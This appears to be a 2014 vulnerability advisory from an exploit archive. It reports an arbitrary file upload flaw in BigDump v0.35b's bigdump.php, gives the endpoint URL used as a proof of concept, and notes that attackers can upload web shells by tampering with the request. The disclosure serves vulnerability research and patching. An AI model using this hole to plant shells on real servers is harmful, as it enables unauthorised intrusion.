14 lines
447 B
Text
Executable file
14 lines
447 B
Text
Executable file
[+] Arbitrary Upload on BigDump v0.35b
|
|
[+] Date: 23/03/2014
|
|
[+] Risk: High
|
|
[+] Author: Felipe Andrian Peixoto
|
|
[+] Vendor Homepage: http://www.ozerov.de/bigdump/
|
|
[+] Contact: felipe_andrian@hotmail.com
|
|
[+] Tested on: Windows 7 and Linux
|
|
[+] Vulnerable File: bigdump.php
|
|
[+] Version: v0.35b
|
|
[+] Exploit : http://host/bigdump.php?start=
|
|
[+] PoC: http://SERVER/bigdump.php?start=
|
|
|
|
Note: allows upload files and shells with tamperdate.
|
|
|